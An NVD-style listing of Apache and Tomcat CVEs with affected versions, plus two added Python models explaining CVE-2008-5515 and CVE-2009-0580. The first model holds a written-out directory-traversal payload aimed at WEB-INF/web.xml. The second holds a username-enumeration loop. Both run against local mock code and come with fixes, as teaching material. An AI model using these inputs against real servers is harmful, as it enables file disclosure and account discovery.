Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server *
redhat enterprise_linux_desktop 5.0
redhat enterprise_linux_workstation 5.0
redhat jboss_enterprise_application_platform 6.0.0
redhat jboss_enterprise_application_platform 6.4.0
redhat enterprise_linux_server 5.0
CVE-2008-0456 LOW

CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.

CVSS 2.0

Severity: LOW

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache http_server *
redhat enterprise_linux_desktop 5.0
redhat enterprise_linux_workstation 5.0
redhat enterprise_linux_server 5.0
CVE-2008-1232 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2008-1947 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat 5.5.12
apache tomcat 5.5.14
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 6.0.13
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 6.0.6
apache tomcat 6.0.8
apache tomcat 6.0.12
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.20
apache tomcat 5.5.23
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 5.5.19
apache tomcat 6.0.2
apache tomcat 6.0.11
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 6.0.9
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 6.0.3
apache tomcat 5.5.22
apache tomcat 6.0.14
CVE-2008-2364 MEDIUM

The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
canonical ubuntu_linux 7.10
apache http_server *
redhat enterprise_linux_desktop 4.0
redhat enterprise_linux_desktop 5.0
redhat enterprise_linux_server 3.0
redhat enterprise_linux_server 4.0
redhat enterprise_linux_desktop 3.0
fedoraproject fedora 9
canonical ubuntu_linux 8.04
canonical ubuntu_linux 6.06
fedoraproject fedora 8
redhat enterprise_linux_workstation 5.0
redhat enterprise_linux_eus 5.2
redhat enterprise_linux_workstation 3.0
redhat enterprise_linux_workstation 4.0
redhat enterprise_linux_server 5.0
redhat enterprise_linux_eus 4.7
CVE-2008-2370 MEDIUM

Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 4.1.33
apache tomcat 4.1.18
apache tomcat 4.1.5
apache tomcat 5.5.14
apache tomcat 4.1.29
apache tomcat 4.1.1
apache tomcat 4.1.34
apache tomcat 4.1.15
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 4.1.17
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 4.1.4
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 4.1.13
apache tomcat 4.1.22
apache tomcat 4.1.7
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 4.1.19
apache tomcat 5.5.16
apache tomcat 4.1.11
apache tomcat 4.1.37
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 4.1.20
apache tomcat 4.1.30
apache tomcat 5.5.8
apache tomcat 4.1.26
apache tomcat 4.1.32
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 4.1.14
apache tomcat 4.1.36
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 4.1.16
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 4.1.8
apache tomcat 4.1.21
apache tomcat 6.0.13
apache tomcat 4.1.25
apache tomcat 4.1.35
apache tomcat 6.0.6
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 4.1.27
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 4.1.0
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 4.1.23
apache tomcat 6.0.9
apache tomcat 4.1.6
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 6.0.14
CVE-2008-2938 MEDIUM

Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2008-2939 MEDIUM

Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
canonical ubuntu_linux 7.10
apache http_server 2.2.6
apache http_server *
apache http_server -
apple mac_os_x *
apache http_server 2.2.4
apache http_server 2.2.8
opensuse opensuse 10.2
apache http_server 2.2.2
canonical ubuntu_linux 8.04
canonical ubuntu_linux 6.06
apache http_server 2.2.9
apache http_server 2.2.1
apache http_server 2.2.0
apache http_server 2.2.3
opensuse opensuse 10.3
opensuse opensuse 11.0
CVE-2008-3271 MEDIUM

Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 4.1.16
apache tomcat 4.1.18
apache tomcat 4.1.5
apache tomcat 4.1.28
apache tomcat 4.1.29
apache tomcat 4.1.1
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 4.1.15
apache tomcat 4.1.8
apache tomcat 4.1.21
apache tomcat 4.1.12
apache tomcat 4.1.17
apache tomcat 4.1.25
apache tomcat 4.1.4
apache tomcat 5.5.0
apache tomcat 4.1.13
apache tomcat 4.1.22
apache tomcat 4.1.7
apache tomcat 4.1.24
apache tomcat 4.1.19
apache tomcat 4.1.11
apache tomcat 4.1.27
apache tomcat 4.1.9
apache tomcat 4.1.0
apache tomcat 4.1.20
apache tomcat 4.1.30
apache tomcat 4.1.26
apache tomcat 4.1.23
apache tomcat 4.1.6
apache tomcat 4.1.14
apache tomcat 4.1.3
CVE-2008-3282 HIGH

Integer overflow in the rtl_allocateMemory function in sal/rtl/source/alloc_global.c in the memory allocator in OpenOffice.org (OOo) 2.4.1, on 64-bit platforms, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted document, related to a "numeric truncation error," a different vulnerability than CVE-2008-2152.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-681,

Products Affected

Vendor Product Version
apache openoffice 2.4.1
fedoraproject fedora 8
fedoraproject fedora 9
CVE-2008-4308 LOW

The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 5.5.10
apache tomcat 4.1.33
apache tomcat 5.5.16
apache tomcat 5.5.12
apache tomcat 5.5.14
apache tomcat 4.1.34
apache tomcat 5.5.15
apache tomcat 5.5.20
apache tomcat 5.5.11
apache tomcat 5.5.18
apache tomcat 5.5.19
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 4.1.32
CVE-2008-5515 MEDIUM

Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 4.1.33
apache tomcat 4.1.18
apache tomcat 5.5.14
apache tomcat 4.1.29
apache tomcat 6.0
apache tomcat 4.1.1
apache tomcat 4.1.34
apache tomcat 5.5.27
apache tomcat 4.1.15
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 4.1.17
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 4.1.13
apache tomcat 4.1.22
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 4.1.19
apache tomcat 5.5.16
apache tomcat 4.1.11
apache tomcat 4.1.37
apache tomcat 4.1.39
apache tomcat 5.5.9
apache tomcat 4.1.38
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 4.1.20
apache tomcat 4.1.30
apache tomcat 5.5.8
apache tomcat 4.1.26
apache tomcat 4.1.32
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 4.1.14
apache tomcat 4.1.36
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 4.1.16
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 4.1.21
apache tomcat 6.0.13
apache tomcat 4.1.25
apache tomcat 4.1.35
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 4.1.27
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 4.1.0
apache tomcat 5.5.19
apache tomcat 4.1.23
apache tomcat 6.0.9
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 6.0.14
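The order of operations in CVE-2008-5515 is the whole bug: the dispatcher normalized the target string before it split off the query string, so ".." sequences that an application had placed inside the query (typically by concatenating user input) collapsed real path components and a forward to "/jsp/view.jsp?page=..." could land on /WEB-INF/web.xml. The Python model below is an added example written for this page, not Tomcat's code; the target string, the "page" parameter and the function names are assumptions for illustration. It shows the vulnerable order, the corrected order, and the application-side hardening (percent-encoding the untrusted value) that neutralizes the problem even on an unpatched container.

```python
import posixpath
from urllib.parse import quote

# Constructed sample: an application forwards to a view and passes a user-supplied
# value through the query string. The traversal lives in the query, not the path.
ATTACK_PAGE = "/../../WEB-INF/web.xml"
TARGET = "/jsp/view.jsp?page=" + ATTACK_PAGE


def dispatch_vulnerable(target: str):
    """Normalize the whole string, then split off the query (the order behind the bug).

    '?' is an ordinary character to the normalizer, so '..' segments that sit inside the
    query string collapse real path components.
    """
    normalized = posixpath.normpath(target)
    path, _, query = normalized.partition("?")
    return path, query


def dispatch_fixed(target: str):
    """Split off the query first; only the path component is ever normalized."""
    path, _, query = target.partition("?")
    normalized = posixpath.normpath(path)
    # posixpath keeps a leading '//' verbatim; force a single root for a servlet context.
    normalized = "/" + normalized.lstrip("/")
    return normalized, query


def build_target_safely(page: str) -> str:
    """Application-side hardening that works even on an unpatched container:
    percent-encode the untrusted value so it contains no '/' for a normalizer to act on."""
    return "/jsp/view.jsp?page=" + quote(page, safe="")


if __name__ == "__main__":
    print("vulnerable:", dispatch_vulnerable(TARGET))                       # ('/WEB-INF/web.xml', '')
    print("fixed:     ", dispatch_fixed(TARGET))                            # ('/jsp/view.jsp', 'page=/../../WEB-INF/web.xml')
    print("encoded:   ", dispatch_vulnerable(build_target_safely(ATTACK_PAGE)))
```

The check to keep from this: any value that reaches RequestDispatcher must be built from encoded components, because the dispatcher is allowed to target WEB-INF (forwarding to /WEB-INF/jsp is normal), so the container cannot simply refuse that prefix; the only defence is making sure attacker data never becomes path structure.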
CVE-2008-5519 LOW

The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 4.1.33
apache tomcat 4.1.29
apache tomcat 4.1.34
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.0.22
apache mod_jk 1.2.14.1
apache tomcat 5.0.5
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 4.1.4
apache tomcat 4.1.13
apache tomcat 4.0.3
apache tomcat 5.5.26
apache mod_jk 1.2.23
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 5.0.23
apache tomcat 5.5.23
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 5.5.13
apache tomcat 4.1.30
apache mod_jk 1.2.13
apache tomcat 5.5.8
apache tomcat 4.1.26
apache tomcat 4.1.32
apache mod_jk 1.2.9
apache tomcat 5.0.0
apache tomcat 4.1.14
apache tomcat 5.5.22
apache tomcat 5.0.26
apache tomcat 5.0.12
apache tomcat 5.0.30
apache mod_jk 1.2.25
apache tomcat 4.1.8
apache tomcat 5.0.9
apache mod_jk 1.2.19
apache tomcat 5.0.29
apache mod_jk 1.2.10
apache mod_jk 1.2.21
apache tomcat 4.1.25
apache tomcat 4.1.35
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 5.5.10
apache tomcat 5.5.25
apache mod_jk 1.2.18
apache tomcat 5.5.4
apache mod_jk 1.2.26
apache mod_jk 1.2.1
apache tomcat 5.5.2
apache tomcat 4.1.0
apache tomcat 5.0.11
apache tomcat 4.1.23
apache tomcat 4.1.6
apache tomcat 5.0.4
apache tomcat 4.1.3
apache tomcat 4.1.2
apache mod_jk 1.2.12
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 4.1.18
apache tomcat 5.0.2
apache tomcat 4.1.5
apache tomcat 5.5.14
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 4.1.17
apache tomcat 5.0.24
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache mod_jk 1.2
apache tomcat 4.1.22
apache tomcat 5.0.13
apache tomcat 4.1.7
apache tomcat 4.1.24
apache tomcat 5.0.28
apache tomcat 4.1.19
apache tomcat 4.1.11
apache tomcat 5.5.9
apache tomcat 4.0.1
apache tomcat 5.5.1
apache mod_jk 1.2.24
apache mod_jk 1.2.8
apache mod_jk 1.2.17
apache mod_jk 1.2.6
apache tomcat 5.5.17
apache tomcat 4.1.20
apache tomcat 5.5.3
apache mod_jk 1.2.7
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 4.1.16
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.21
apache tomcat 4.1.21
apache tomcat 5.0.25
apache tomcat 5.0.10
apache tomcat 4.0.6
apache mod_jk 1.2.16
apache tomcat 5.0.6
apache mod_jk 1.2.11
apache mod_jk 1.2.20
apache mod_jk 1.2.15
apache mod_jk 1.2.14
apache tomcat 4.1.27
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.19
apache tomcat 5.0.18
apache mod_jk 1.2.22
apache tomcat 5.0.1
CVE-2009-0023 MEDIUM

The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache apr-util *
apache apr-util 1.1.0
apache apr-util 0.9.2
apache apr-util 0.9.3
apache apr-util 1.1.1
apache apr-util 1.2.8
apache apr-util 1.0.1
apache apr-util 1.1.2
apache apr-util 1.2.1
apache apr-util 1.2.2
apache apr-util 1.3.3
apache apr-util 0.9.1
apache apr-util 1.2.7
apache apr-util 1.0
apache apr-util 1.3.2
apache apr-util 1.2.6
apache apr-util 0.9.5
apache apr-util 1.3.0
apache apr-util 1.0.2
apache apr-util 1.3.1
apache apr-util 0.9.4
CVE-2009-0026 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jackrabbit 1.4
apache jackrabbit 1.5.0
CVE-2009-0033 MEDIUM

Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 4.1.33
apache tomcat 4.1.18
apache tomcat 4.1.5
apache tomcat 5.5.14
apache tomcat 4.1.29
apache tomcat 4.1.1
apache tomcat 4.1.34
apache tomcat 5.5.27
apache tomcat 4.1.15
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 4.1.17
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 4.1.4
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 4.1.13
apache tomcat 4.1.22
apache tomcat 4.1.7
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 4.1.19
apache tomcat 5.5.16
apache tomcat 4.1.11
apache tomcat 4.1.37
apache tomcat 4.1.39
apache tomcat 5.5.9
apache tomcat 4.1.38
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 4.1.20
apache tomcat 4.1.30
apache tomcat 5.5.8
apache tomcat 4.1.26
apache tomcat 4.1.32
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 4.1.14
apache tomcat 4.1.36
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 4.1.16
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 4.1.8
apache tomcat 4.1.21
apache tomcat 6.0.13
apache tomcat 4.1.25
apache tomcat 4.1.35
apache tomcat 6.0.6
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 4.1.27
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 4.1.0
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 4.1.23
apache tomcat 6.0.9
apache tomcat 4.1.6
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 6.0.14
CVE-2009-0580 MEDIUM

Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 4.1.33
apache tomcat 4.1.18
apache tomcat 4.1.5
apache tomcat 5.5.14
apache tomcat 4.1.29
apache tomcat 4.1.1
apache tomcat 4.1.34
apache tomcat 5.5.27
apache tomcat 4.1.15
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 4.1.17
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 4.1.4
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 4.1.13
apache tomcat 4.1.22
apache tomcat 4.1.7
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 4.1.19
apache tomcat 5.5.16
apache tomcat 4.1.11
apache tomcat 4.1.37
apache tomcat 4.1.39
apache tomcat 5.5.9
apache tomcat 4.1.38
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 4.1.20
apache tomcat 4.1.30
apache tomcat 5.5.8
apache tomcat 4.1.26
apache tomcat 4.1.32
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 4.1.14
apache tomcat 4.1.36
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 4.1.16
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 4.1.8
apache tomcat 4.1.21
apache tomcat 6.0.13
apache tomcat 4.1.25
apache tomcat 4.1.35
apache tomcat 6.0.6
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 4.1.27
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 4.1.0
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 4.1.23
apache tomcat 6.0.9
apache tomcat 4.1.6
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 6.0.14
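CVE-2009-0580 is an error-path oracle: a malformed percent-escape in j_password only fails loudly when the realm gets as far as processing the password, which it does only for a user that exists, so the difference between a clean login failure and a server error reveals valid usernames. The Python below is an added example modelling that bug class, not Tomcat's realm code; the realm contents, the "%" probe and the assumption that an unhandled decode error reaches the client as a distinguishable response are constructed for illustration. It shows the vulnerable order, the corrected handling, and the attacker's enumeration loop run against both.

```python
import re

# Constructed realm: two valid accounts; the attacker's goal is the set of valid names.
USERS = {"tomcat": "s3cret", "admin": "hunter2"}

_PCT = re.compile(r"%([0-9A-Fa-f]{2})")


class DecodeError(Exception):
    """A malformed %XX sequence in a form field (assumed to surface as an HTTP 500)."""


def strict_unquote(value: str) -> str:
    """application/x-www-form-urlencoded decoding that refuses malformed escapes."""
    out = []
    i = 0
    while i < len(value):
        ch = value[i]
        if ch == "%":
            m = _PCT.match(value, i)
            if m is None:
                raise DecodeError("malformed escape at offset %d" % i)
            out.append(chr(int(m.group(1), 16)))   # ASCII-only assumption for the demo
            i += 3
        else:
            out.append(" " if ch == "+" else ch)
            i += 1
    return "".join(out)


def authenticate_vulnerable(username: str, raw_password: str) -> bool:
    """Vulnerable order: look the user up first; the password is decoded only if the user exists."""
    stored = USERS.get(username)
    if stored is None:
        return False                                   # unknown user: the escape is never examined
    return strict_unquote(raw_password) == stored      # known user: DecodeError escapes to the client


def authenticate_fixed(username: str, raw_password: str) -> bool:
    """Decode before the lookup and fold every failure into the same negative answer."""
    try:
        password = strict_unquote(raw_password)
    except DecodeError:
        return False
    stored = USERS.get(username)
    return stored is not None and password == stored


def enumerate_users(auth, candidates, probe: str = "%") -> list:
    """Attacker's oracle: a name for which the probe errors out, rather than failing cleanly, exists."""
    found = []
    for name in candidates:
        try:
            auth(name, probe)
        except DecodeError:
            found.append(name)
    return found


if __name__ == "__main__":
    names = ["root", "tomcat", "guest", "admin"]
    print("vulnerable realm leaks:", enumerate_users(authenticate_vulnerable, names))
    print("fixed realm leaks:     ", enumerate_users(authenticate_fixed, names))
```

The same pattern applies to any authentication path: every input-validation step that can fail must run before, and independently of, the lookup that decides whether the account exists, and all failures must collapse to one response.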
CVE-2009-0781 MEDIUM

Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 4.1.33
apache tomcat 4.1.18
apache tomcat 4.1.5
apache tomcat 5.5.14
apache tomcat 4.1.29
apache tomcat 6.0
apache tomcat 4.1.1
apache tomcat 4.1.34
apache tomcat 4.1.15
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 4.1.17
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 4.1.4
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 4.1.13
apache tomcat 4.1.22
apache tomcat 4.1.7
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 4.1.19
apache tomcat 5.5.16
apache tomcat 4.1.11
apache tomcat 4.1.37
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 4.1.20
apache tomcat 4.1.30
apache tomcat 5.5.8
apache tomcat 4.1.26
apache tomcat 4.1.32
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 4.1.14
apache tomcat 4.1.36
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 4.1.16
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 4.1.8
apache tomcat 4.1.21
apache tomcat 6.0.13
apache tomcat 4.1.25
apache tomcat 4.1.35
apache tomcat 6.0.6
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 4.1.27
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 4.1.0
apache tomcat 5.5.19
